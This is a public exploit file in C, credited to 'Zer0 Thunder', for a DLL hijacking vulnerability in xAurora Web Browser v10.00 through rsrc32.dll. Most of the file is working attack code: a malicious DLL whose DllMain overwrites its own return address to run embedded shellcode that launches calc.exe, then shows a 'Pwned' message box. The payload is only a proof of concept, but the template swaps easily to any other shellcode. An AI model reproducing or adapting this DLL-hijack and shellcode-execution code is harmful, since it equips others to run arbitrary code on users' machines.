/* 
Exploit  : xAurora Web Browser v10.00 (rsrc32.dll) DLL Hijacking Exploit
Software : xAurora Web Browser v10.00 Build 12:10:2005 - Powered By ICTA
Language : Win32-Assembly Language
Download : http://groups.google.com/group/sinhala-bloggers/attach/eb2320098a36a156/xAurora2008-RC1-Final-Lite.rar?part=4
Vuln     : DLL Hijack (rsrc32.dll )
Author   : Zer0 Thunder
Sites    : zt-security.net 
E-mail   : neonwarlock@live.com

Greetz : To all Sri Lankan Hackers &and my friends at ZT

Discription : xAurora Web Browser has multiple vulnerabilities becoase it uses most of the IE libraries from windows system
there for most of the exploits are published for Windows IE works on xAurora Web Browser too. This Exploitation Only Written to Exploit
the DLL Vulnerability currently on the rsrc32.dll, the exploit will execute the calc & bring out a MsgBox through the Injected DLL

Exploied Result : http://img651.imageshack.us/img651/9456/exploited.jpg


*/

#include <windows.h>
#include <stdlib.h>
#include <string.h>


char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00";

int xAuroraPwnage()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK);
return 0;

}  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  xAuroraPwnage();
  return 0;
}